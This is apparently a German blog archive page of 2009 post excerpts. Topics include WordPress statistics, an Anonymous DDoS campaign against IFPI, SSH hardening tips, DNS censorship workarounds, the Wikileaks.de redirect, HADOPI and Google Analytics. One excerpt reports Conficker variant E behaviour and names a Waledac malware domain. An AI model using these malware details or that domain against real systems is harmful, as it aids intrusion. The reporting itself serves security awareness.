Die nackten Zahlen sprechen für sich und es läßt sich feststellen das Wordpress unangefochtener Liebling der deutschen Blogosphäre ist und wohl auch die nächste Zeit bleiben wird. Mit Version 2.8 kommt demnächst eine neue Version heraus und vielleicht werden dann auch einige alte Versionen durch diese neue ersetzt. Andere Blogsoftware fällt eigentlich bis auf Serendipity oder Antville komplett aus dem Raster und scheint irrelevant.

Technisches zur Versionsbestimmung
Um die Wordpress Versionen zu bestimmen habe ich hauptsächlich im Quellcode der Blogstartseite nachgeschaut um Hinweise zu bekommen. Ob der dort angegebene Versionswert jedesmal mit dem wirklichen Wert übereinstimmt, läßt sich kaum sagen, sollte aber im Normalfall korrekte Werte liefern. In Fällen wo sich damit keine Version bestimmen ließ, habe ich die Wordpress Version unter unbekannt vermerkt. Die Unterschung fand am 20. April statt und griff auf die Daten von deutscheblogcharts.de Ausgabe 15/2009 vom 15.04.2009 zurück .

Related posts:

• Blogsoftware Statistik der Technorati Top100 Blogs
• Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML
• 35% der deutschen Top100 Blogs nutzen altes Google Analytics Script
• Die zuverlässigsten Blog-Dienste
• (Sticky) Upgrade + neues Theme

Scheinbar gehen die aktuellen Attacken von der weltweit venetzten, aber dezentral organisierten, Gruppe Anonymous aus, einer Quasi-Vereinigung von Netzaktivisten. Diese Netzkultur (Wikipedia) ist bekannt aus Protesten gegen Scientology.

Auf irc.annonet.org diskutieren hunderte von Usern über Vergeltungsmaßnahmen gegen die IFPI und die sie vertretenen Anwälte und ihr Bestreben die Webseite ifpi.org mindestens am Montag durch DDoS aus dem Internet zu bekommen.

Coldblood, ein Admin von anonnet.org gegenüber The Register:

“Sie wollen damit eine Nachricht übermitteln, dass die IFPI sich nicht mit dem Internet anlegen sollte und dass das Internet ein ernstes Geschäft ist. Dies ist ähnlich wie im Fall [der Proteste] gegen Scientology, welche vor mehr als einem Jahr begannen”

Der aktuelle Angriff trägt den Namen “Operation Baylout“. Ergebnisse, Pläne und Anleitungen für die Angriffe finden sich auf der dortigen Projektseite. Inwiefern die IFPI darauf reagiert und ob sie bereits geeignete Gegenmaßnahmen ergrriffen haben, wird sich zeigen.

Related posts:

• DDoS Angriffe auf mehrere Webhoster und DNS Provider
• DDos Angriffe auf bekannte russische Gay Webseiten
• DDoS Angriff auf mehrere Sicherheits-Webseiten
• DDoS Angriff auf Register.com
• DDoS lähmt Kirgistan – Teil 2

Deswegen betonen sie in einem jüngst erschienen Hinweis die Wichtigkeit von sicheren Benutzernamen und Passwörtern. Vielleicht etwas zu extrem ausgedrückt, aber der Problematik angemessen sagen sie:

“Wenn Sie einen über das Internet offen erreichbaren SSH-Server am laufen haben und die Benutzernamen und Passwörter nicht mindestens 8 Zeichen lang sind, ist der Server entweder bereits geknackt oder wird es bald sein. Dabei ist es völlig egal um was für Geräte es sich handelt – diejenigen die solche Scans durchführen haben längst bewiesen das sie fähig sind Cisco Router zu übernehmen oder iMac’s zu untergraben.”

Ergreife Gegenmaßnahmen

Dabei gibt es viele recht einfache Gegenmaßnahmen:

• Filter (per IP) wer auf SSH zugreifen kann. Wer garnicht erst den SSH-Server erreichen kann, lann ihn auch nicht brutforcen.
• Konfiguriere SSH so das nur Passwortgeschütze SSH Schlüssel benutzt werden können und klare bzw. leere Passwörter verboten sind.
• Benutze schwer zu ratene Benutzernamen. Angreifer versuchen es meist mit den Standardnamen wie admin oder root.
• Benutze einen anderen SSH Port als Port 22 um viele automatisierte Angriffe ins Leere laufen zu lassen.
• Scanne das eigene Netzwerk um herauszufinden wo überall SSH läuft, bevor andere es tun.
• Benutze “fail2ban”, obgeich das laut DShield nicht gegen die neuerdings so stark verbreiteten verteilten SSH Angriffe nützt.
• Weise Nutzer, Freunde, Bekannte, Kollegen ect. darauf hin gute Passwörter zu nutzen.
• Beobachte die Logdateien.

All diese Dinge helfen gegen SSH-Angriffe und verringern im einfachste Fall die Anzahl der Attacken auf ein sehr niedriges Maß.

Links

SSH absichern

Related posts:

• DDoS Angriffe auf mehrere Webhoster und DNS Provider
• Bis zu 450.000 SQL Injection Angriffe pro Tag
• DDoS lähmt Kirgistan – Teil 2
• DDoS Angriff auf Register.com
• DDos Angriffe auf bekannte russische Gay Webseiten

• Deutsche Telekom
• Vodafone/Arcor
• Hansenet/Alice
• Telefonica/O2
• Kabel Deutschland

Darum nutzt freie, unabhängige DNS-Server. Klar, nicht um Zugang zu solchen Seiten zu haben (traurig das man dies immer dazuschreiben muss), sondern um den Internet-Nichtverstehern zu zeigen das ihre Maßnahmen nichts als heiße Wahlkampfluft und Propaganda ist. Und das all ihre Lügen (danke @netzpolitik.org) irgendwann die breite Masse erreichen werden.

$ cat /etc/resolv.conf
nameserver 213.73.91.35 # dnscache.berlin.ccc.de
nameserver 85.214.73.63 # FoeBud e.V.

Weitere Informationen und alternative DNS-Server finden sich auf Wikileaks – Alternative DNS:

Diese Seite listet Richtlinien und Hilfen zur Umgehung von länderspezifischen DNS-Sperren. Ein DNS-Server ist eine Art Telefonbuch, welches dem Computer hilft, eine bestimmte Adresse oder Website zu besuchen und/oder diese zu erreichen.

Die Liste gibt dir auch einen Überblick über Organisationen, die einen ungefilterten Zugang zum Internet ermöglichen und sich für die freiheitlichen Rechte der Bürger einsetzen, sowie Service-Providern, die sich entschieden haben, die Filterlisten nicht zu implementieren.

Related posts:

• Neue Form von DNS Amplification erleichtert DDoS Angriffe
• Conficker Virus baut Abwehrmaßnahmen aus
• Links #6
• Speicherdauer von USA-Einreisedaten bald 75 Jahre
• Bund: VDS-Kritiker sind Schuld

aufgrund von Krankheit kann ich vorübergehend dieses Blog nicht weiterführen. Es sollte allerdings ungefähr in einer Woche wieder weitergehen.

Bis dahin aktuell passend:
(via Netzpolitik via Martin Haase)

Related posts:

• 25C3 – Auf geht’s
• BKA-Gesetz: Vermittlungsausschuss hat sich geeinigt
• 25C3 – Tag 2 #2
• 71% der deutschen Top100 Blogs nutzen Wordpress
• Das weltweite schönste Rechenzentrum

Diese Umleitung der deutschen Domain zeigt, was in Zukunft zu erwarten ist. Unliebsame Inhalte werden kurzerhand komplett übernommen und effektiv gesperrt. Wikileaks selbst sagte in einer Pressemitteilung das Deutschland nach China nun das zweite Land sei, welches eine Domain von Wikileaks sperrt. Allein das zeigt schon wohin die Reise zu gehen scheint.

Doch nach dem ersten Schock und den darauf folgenden empörten Reaktionen, kommt es nun zu aktiven Widerstandsaktionen. Wikileaks hatte kurzerhand aufgerufen deutsche Domains zu spenden und diese auf Wikileaks zu verweisen. Dieser Aufruf scheint inzwischen gehört zu werden und erste Früchte zu tragen. Folgende neue Domains verweisen inzwischen auf das Angebot von Wikileaks:

• http://unzensiert.cgisecurity.de
• http://wikileaks.globalnode.eu
• http://repressionsstaat.de
• http://zensur-stop.de
• …

Update 1:
Weitere Domains werden ab sofort hier auf Wikileaks gelistet.

Gespannt darf man also auf die Reaktion der Behörden beziehungsweise der Denic sein. Vor allem die Begründung der Umleitung von wikileaks.de wird mit Spannung erwartet.

Update 2:
Eine sogenannte TRANSIT-Info Seite, auf die wikileaks.de momentan zeigt, wird unter anderem auch angezeigt, falls der Provider den Vertrag kündigt. Womöglich hat in diesem Fall der Provider die Sache ins Rollen gebracht. Weiteres läßt sich aber wohl erst nach einer Stellungnahme der DENIC, des Providers oder der Behörde sagen, die dafür schlußendlich verantwortlich ist.

Update 3:
Laut netzpolitik.org wird der Provider der Domain am Dienstag eine Stellungnahme abgeben. Laut seiner Aussage hatte er nichts mit der Hausdurchsuchung neulich und auch nichts mit der aktuellen Umleitung zu tun.

Update 4:
Laut Wikileaks wurde die Domain nach Angabe der DENIC vom Domain Registrar gelöscht.

Related posts:

• Netzsperren und andere Sauereien
• Ausnutzung von Sicherheitslücken immer schneller
• Hausdurchsuchung bei wikileaks.de *Update*
• Netzsperre für Frankreichs Internetbeauftragte
• Erster Massen-Email Virus Melissa wird 10 Jahre alt

Loi HADOPI oder auch “Création et Internet” war als Maßnahme gegen Filesharer gedacht um ihnen bei wiederholten Verstößen gegen Urheberrechte der Internetzugang gesperrt wird. Dabei wären auf Beschwerde der Musik- und Filmindustrie ect. von einer eigens neu angelegten Behörde zuerst Warnbriefe an die Betreffenen geschickt worden um ihnen dann im schlimmsten Fall für 1 Jahr das Internet zu sperren.

Zur heutigen Abstimmung kommt dazu, dass einige UMP’ler zuletzt doch mehr Unbehagen mit dem Gesetz hatte, weil einige Verschärfungen ihnen doch zu weit gingen. So hätten gesperrte Nutzer ihren Internetanschluß weiter bezahen müssen. Falls es nun nicht zu einer erneuten Abstimmung kommen sollte, shceint das Gesetz vorerst vom Tisch!

Related posts:

• Bundesrat genehmigt BKA-Gesetz mit 1 Stimme Mehrheit
• Letzter Versuch: Innenminister wollen BKA-Gesetz
• BKA-Gesetz droht im Bundesrat zu scheitern
• BKA-Gesetz: Vermittlungsausschuss hat sich geeinigt
• Deutscher Fachjournalisten-Verband vs. BKA-Gesetz

Dann aber konnte letzte Nacht eine Veränderung festgestellt werden. Laut TrendMicro wurde eine neue Dateiversion auf einem befallenen Testrechner entdeckt. Diese neue Version wurde am 7. April um 7:41 Uhr erzeugt. Ein Vergleich mit den P2P Daten brachte die Erkenntnis das diese neue Version nicht über einen normalen HTTP Download von einem der zig von Conficker generierten Domainnamen bezogen wurde, sondern direkt von einem P2P Node aus Korea kam. Dies ist somit Variante E (laut TrendMicro) des Virus.

Eine Analyse dieser neuen Version zeigt einige neue Verhaltensmuster auf:

1. Am 3. Mai 2009 wird diese Variante den Dienst beenden
2. Sie läuft unter zufälligen Dateinamen und zufälligen Dienstnamen
3. Sie wird danach die Komponente und alle anderen Spuren wie Registry-Daten löschen
4. Verteilt sich über MS08-067 Bug an externe IPs, falls eine Internetverbindung vorhanden ist. sonst werden lokale IPs versucht.
5. Öffnet Port 5114 und dient als HTTP Server durch Broadcast via SSDP Anfragen
6. Verbindet sich mit den folgenden Webseiten:
   • Myspace.com
   • msn.com
   • ebay.com
   • cnn.com
   • aol.com

Interessant ist vor allem auch der Punkt, das der Rechner mit der E-Variante eine bekannte Waledac Domain (goodnewsdigital[dot]com) ansteuerte und eine weitere verschlüsselte Datei versuchte herunterzuladen. Dies geschah zufälligerweise direkt nach dem Auftauchen der neuen Version auf dem Testrechner. Auf der entsprechenden Domain findet sich zur Zeit ein neues Waledac Binary. Ob es zwischen Conficker und dem Waledac Botnetz nun eine Verbindung gibt oder ob dies eher Zufall oder ein Täuschungsmannöver ist, ist zur Zeit noch unklar. Festzuhalten bleibt jedenfalls das Confickers P2P Kommunikationsnetz scheinbar funktionsfähig ist und aktiv genutzt wird.

Related posts:

• Waledac Botnetz wieder aktiver
• Neue Tor Version markiert Ende der 0.1.2.x Reihe
• 4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen
• Conficker befällt deutsche Fachhochschule
• Conficker Virus baut Abwehrmaßnahmen aus

Zwei Dinge sind dabei interessant. Zum einen der hohe Prozentsatz an Blogs die Google Analytics einsetzen. Zum anderen der Fakt das noch immer so viele davon noch keine Aktualisierung der Tracking Software vorgenommen haben. Google hat vor mehr als einem Jahr die Entwicklung vom ursprünglich eingesetzten urchin.js Script auf das neue ga.js Script verlagert. Das in dieser langen Zeit fast die Hälfte der Blogs kein Upgrade vorgenommen hat ist schon erstaunlich.

Das Problem in der Benutzung von urchin.js

Der wichtigste Punkt ist hierbei das Google seit dem Wechsel zu ga.js die Betreuung von urchin.js eingestellt hat. Das heißt, dass seit der Einführung von ga.js im Dezember 2007 die Entwicklung von urchin.js stehenblieb. Als Google auf ga.js gewechselt ist, nahm man an, dass das alte Script noch etwa 12-18 Monate unterstützt wird. Das wäre bald der Fall. Laut Julien Coquet, einem Google Analytics Berater, wird urchin.js irgendwann in diesem Sommer eingemottet. Gefragt was danach passiert, meinte Coquet, dass möglicherweise ein 404 Fehler (Datei nicht gefunden) zurückgegeben wird und damit auch keine Messung des Traffics und der Besucher mehr möglich ist.

Features die einem mit dem veralteten urchin.js entgehen

Nach dem Wechsel von Google auf ga.js hat sich eine Menge getan und der Code wurde weiter verbessert und neue Features hinzugefügt. Mit ga.js stehen damit gegenüber folgende Verbesserungen zur Verfügung:

• schnellerer und kleiner Quellcode
• automatische Erkennung von HTTPS
• vergrößerte Namensraumsicherheit
• bequemere Einrichtung zum Verfolgen von E-Commerce Transaktionen
• besser anpassbarer Code für interaktive auf ajax basierende Webseiten
• sofortiger Zugriff auf neue Features und Berichte, wenn diese bereitgestellt werden

Andere benutze Web Analytics Software

Der vollständigkeithalber habe ich noch einen sehr kurzem Blick auf einige weitere benutzte Analytics Software geworfen und herausgekommen ist folgende kleine Statistik:

Web Analytics Software der Top100 Blogs:

• 64 Blogs setzen Google Analytics ein
• 4 Blogs nutzen das Script von Statcounter
• 3 Blogs verwenden Piwik
• 2 Blogs setzen auf die Dienste von Mint

73 von 100 Blogs verwenden also entweder Google Analytics, Piwik, Mint oder Statcounter. Die restlichen Blogs setzen entweder keine oder andere Dienste ein, die hier allerdings nicht weiter überprüft wurden.

Web Analytics software der Top100 Blogs

Insbesondere der nur kleine Anteil von Piwik hat mich erstaunt. Auf diesem Blog wird dies ebenfalls eingesetzt und verrichtet seitdem ohne Probleme seinen Dienst. Zumal Piwik eine gute Open Source Alternative zu Google Analytics ist, ständig weiterentwickelt wird und für die meisten Webseiten völlig ausreichen sollte. Auch der Datenschutzaspekt ist ein wichtiger Punkt, da Piwik im Gegensatz zu Google Analytics nicht auf einen zentralen Server setzt, sondern jeweils auf dem entsprechenden Webspace beziehungsweise Server installiert wird und damit keine Nutzerdaten quer durch das Internet rauschen.

Fazit

Wer unbedingt weiter auf Google Analytics setzen will, sollte einmal überprüfen ob die aktuelle Version im eigenen Blog verwendet wird, oder noch auf die inzwischen recht veraltete Version gesetzt wird. Grade im Hinblick auf neue Features und der möglichen Abschaltung von urchin.js sollte Motivation genug sein. Ansonsten vielleicht ein Anlass um aus Datenschutzgründen auf Dienste wie Piwik umzusteigen.

UPDATE
Google hat inzwischen ein Statement zum Thema abgegeben:

“Wir haben momentan keine Absicht urchin.js einzumotten. Aber es wird der Tag kommen an dem wir dies tun werden, aber zu diesem Zeitpunkt werden wir sicherstellen das alle Benutzer im vorhinein eine Benachrichtigung bekommen und Zeit zum wechseln haben. In der Zwischenzeit gibt es genügend gute Gründe auf ga.js zu wechseln”

Related posts:

• 71% der deutschen Top100 Blogs nutzen Wordpress
• Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML
• Blogsoftware Statistik der Technorati Top100 Blogs
• Google Analytics adé
• Ladezeiten von Google Analytics Skripten in der Hauptzeit in Europa 97% langsamer